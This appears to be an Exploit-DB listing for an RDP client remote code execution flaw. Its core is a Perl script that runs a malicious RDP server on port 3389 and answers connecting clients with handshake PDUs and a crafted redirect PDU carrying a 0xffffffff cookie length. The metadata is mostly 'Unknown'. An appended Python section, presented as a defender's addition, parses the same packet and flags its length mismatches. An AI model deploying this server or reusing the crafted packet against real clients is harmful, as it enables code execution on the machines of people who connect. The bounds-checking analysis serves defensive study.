Vendor: Unknown
Author: Unknown
CVSS: 9 (CRITICAL)
Type: Remote Code Execution
CWE: Unknown
Product Name: Unknown
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE/CVE: Unknown
CPE: Unknown
Metasploit: (none listed)
Other Scripts: (none listed)
Platforms Tested: Unknown

Remote Desktop Protocol (RDP) Remote Code Execution Vulnerability

This exploit takes advantage of a vulnerability in Remote Desktop Protocol (RDP) handling, allowing an attacker to execute arbitrary code on a vulnerable system. The script below acts as a malicious RDP server listening on port 3389: once a client connects, it replies with a sequence of connection PDUs that ends in a specially crafted redirect PDU whose cookie length field (0xffffffff) does not match the 64 bytes of data that actually follow it, triggering the vulnerability in the connecting system.

Mitigation:

To mitigate this vulnerability, it is recommended to apply the latest security updates provided by the vendor. Additionally, it is advised to restrict access to the RDP service and use strong passwords for authentication.

Exploit-DB raw data:

#!/usr/bin/perl
#
# http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=697

use strict;
use IO::Socket;

my $sock = IO::Socket::INET->new(LocalAddr => '0.0.0.0', LocalPort => '3389', Listen => 1, Reuse => 1) || die($!);

my $evil =	"\x03\x00\x01\x47\x02\xf0\x80\x68\x00\x01\x03\xeb\x70\x81\x38" .	# TPKT header, X.224 data TPDU, MCS SendDataIndication (channel 1003)
		"\x01\x00\x10\x00" .
		"\xc5\x32" .
		"\x04\x75" .							# PDU TYPE == 0x4 == PDU_REDIRECT
		"\xb7\xda\xf8\x43" .
		"\x01\x00\x00\x00" .
		"\x01\x00\x00\x00" .
		"\xff\xff\xff\xff" .						# len of g_redirect_cookie
		"\x41" x 64 ;							# g_redirect_cookie

# Act as a malicious RDP server: for every client that connects, answer each
# line received with the handshake PDUs (ONE..SEVEN) followed by the crafted
# redirect PDU in $evil.
while(my $c = $sock->accept())
{
	while(<$c>)
	{
		print $c ONE(), TWO(), THREE(), FOUR(), FIVE(), SIX(), SEVEN(), $evil;
	}
}

sub ONE()
{
	"\x03\x00\x00\x0b\x06\xd0\x00\x00\x12\x34\x00"
}

sub TWO()
{
	"\x03\x00\x01\x49\x02\xf0\x80\x7f\x66\x82\x01".
	"\x3d\x0a\x01\x00\x02\x01\x00\x30\x1a\x02\x01".
	"\x22\x02\x01\x03\x02\x01\x00\x02\x01\x01\x02".
	"\x01\x00\x02\x01\x01\x02\x03\x00\xff\xf8\x02".
	"\x01\x02\x04\x82\x01\x17\x00\x05\x00\x14\x7c".
	"\x00\x01\x2a\x14\x76\x0a\x01\x01\x00\x01\xc0".
	"\x00\x4d\x63\x44\x6e\x81\x00\x01\x0c\x08\x00".
	"\x04\x00\x08\x00\x03\x0c\x0c\x00\xeb\x03\x01".
	"\x00\xec\x03\x00\x00\x02\x0c\xec\x00\x02\x00".
	"\x00\x00\x02\x00\x00\x00\x20\x00\x00\x00\xb8".
	"\x00\x00\x00\x29\x60\xbb\x2f\xc4\x4d\x00\x9e".
	"\x58\x8a\xb4\x85\x35\x6a\x71\xea\xad\xf9\x3d".
	"\x0e\x5e\x8e\x87\x64\x2d\x52\x42\xed\xb2\x91".
	"\x3f\xf9\x01\x00\x00\x00\x01\x00\x00\x00\x01".
	"\x00\x00\x00\x06\x00\x5c\x00\x52\x53\x41\x31".
	"\x48\x00\x00\x00\x00\x02\x00\x00\x3f\x00\x00".
	"\x00\x01\x00\x01\x00\xf9\xa3\x35\xb2\x78\x63".
	"\x8d\x94\x65\x47\x22\x54\x49\x55\xae\x6f\x74".
	"\x69\x73\x6e\xee\x2b\xa5\xd0\x47\xf6\xc0\x89".
	"\x2e\xa0\x54\xf5\x12\x87\x75\xb5\x89\xf7\x83".
	"\x48\xd9\x54\xeb\xde\x20\x73\xd6\xd8\xf3\xee".
	"\x0f\xf7\xc2\xaa\xa4\x79\x0a\x5a\x64\x92\x53".
	"\xc4\x75\xd4\x00\x00\x00\x00\x00\x00\x00\x00".
	"\x08\x00\x48\x00\xf6\x20\x04\x62\x5b\x2f\x04".
	"\xae\x02\x04\x4a\x7e\xcf\x59\x02\x11\xf7\x7f".
	"\xab\x74\x95\xce\x01\x4e\xf6\x14\x50\x0b\xd7".
	"\x54\x8f\xf0\x92\xd5\x0c\x6f\x42\xd8\x21\x98".
	"\x9f\x87\x50\x9a\x33\x6c\xef\x65\x05\x5c\x4a".
	"\x93\x51\xc1\x69\x59\x7c\x3d\xf4\x63\xdc\x53".
	"\x66\x3b\x00\x00\x00\x00\x00\x00\x00\x00"
}

sub THREE()
{
	"\x03\x00\x00\x0b\x02\xf0\x80\x2e\x00\x00\x04"
}

sub FOUR()
{
	"\x03\x00\x00\x0f\x02\xf0\x80\x3e\x00\x00\x04\x03\xed\x03\xed"
}

sub FIVE()
{
	"\x03\x00\x00\x0f\x02\xf0\x80\x3e\x00\x00\x04\x03\xeb\x03\xeb"
}

sub SIX()
{
	"\x03\x00\x00\x0f\x02\xf0\x80\x3e\x00\x00\x04\x03\xec\x03\xec"
}

sub SEVEN()
{
	"\x03\x00\x00\x22\x02\xf0\x80\x68\x00\x01\x03\xeb\x70\x14\x80\x02\x10\x00\xff\x03\x10\x00\x07\x00\x00\x00\x02\x00\x00\x00\x30\x9a\x00\x00"
}

# milw0rm.com [2008-05-11]
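As an added defender's example (not part of the original exploit listing), the following Python walks the byte layout of the `$evil` string above and applies the bounds check a receiving parser must perform: the 4-byte cookie length, the MCS length and the TPKT length each have to agree with the bytes actually on the wire. The field offsets, the little-endian cookie length and the well-formed counterpart packet are assumptions derived from the layout of `$evil`, not taken from a specification.

```python
import struct

# Constructed sample: the redirect PDU exactly as the Perl script assembles $evil
# (TPKT header, X.224 data TPDU, MCS Send Data Indication, then the redirect packet).
EVIL_PDU = (b"\x03\x00\x01\x47\x02\xf0\x80\x68\x00\x01\x03\xeb\x70\x81\x38"
            b"\x01\x00\x10\x00" b"\xc5\x32" b"\x04\x75"
            b"\xb7\xda\xf8\x43" b"\x01\x00\x00\x00" b"\x01\x00\x00\x00"
            b"\xff\xff\xff\xff" + b"\x41" * 64)

# Constructed well-formed counterpart (assumption: same layout, lengths made consistent):
# TPKT length 103, MCS length 88, cookie length 64 (assumed little-endian).
GOOD_PDU = (b"\x03\x00\x00\x67\x02\xf0\x80\x68\x00\x01\x03\xeb\x70\x80\x58"
            + EVIL_PDU[15:35] + b"\x40\x00\x00\x00" + b"\x41" * 64)

PDU_TYPE_OFFSET = 21     # 0x04 == PDU_REDIRECT, per the exploit's own comment
COOKIE_LEN_OFFSET = 35   # 4-byte cookie length field, immediately followed by the cookie
COOKIE_OFFSET = COOKIE_LEN_OFFSET + 4

def check_redirect_pdu(data: bytes) -> list:
    """Return the inconsistencies found in the PDU; an empty list means every
    declared length agrees with what is actually present on the wire."""
    findings = []
    if len(data) < COOKIE_OFFSET or data[0] != 0x03:
        return ["too short or not a TPKT packet"]
    tpkt_len = struct.unpack(">H", data[2:4])[0]          # TPKT length is big-endian
    if tpkt_len != len(data):
        findings.append(f"TPKT length {tpkt_len} but {len(data)} bytes on the wire")
    # MCS PER length: only the 2-byte form (high bit set), which is what $evil uses
    if not data[13] & 0x80:
        return findings + ["unexpected MCS length encoding"]
    mcs_len = ((data[13] & 0x7F) << 8) | data[14]
    if mcs_len != len(data) - 15:
        findings.append(f"MCS length {mcs_len} but {len(data) - 15} bytes follow it")
    if data[PDU_TYPE_OFFSET] != 0x04:
        findings.append("not a PDU_REDIRECT")
    cookie_len = struct.unpack("<I", data[COOKIE_LEN_OFFSET:COOKIE_OFFSET])[0]
    remaining = len(data) - COOKIE_OFFSET
    if cookie_len > remaining:
        findings.append(f"cookie length {cookie_len:#x} exceeds the {remaining} bytes remaining")
    return findings

def parse_redirect_cookie(data: bytes):
    """Bounds-checked extraction: the cookie is returned only when all lengths are consistent."""
    if check_redirect_pdu(data):
        return None
    cookie_len = struct.unpack("<I", data[COOKIE_LEN_OFFSET:COOKIE_OFFSET])[0]
    return data[COOKIE_OFFSET:COOKIE_OFFSET + cookie_len]
```

Run against `EVIL_PDU` the check reports three mismatches (TPKT, MCS and cookie length) and the parser refuses the packet, while `GOOD_PDU` yields the 64-byte cookie.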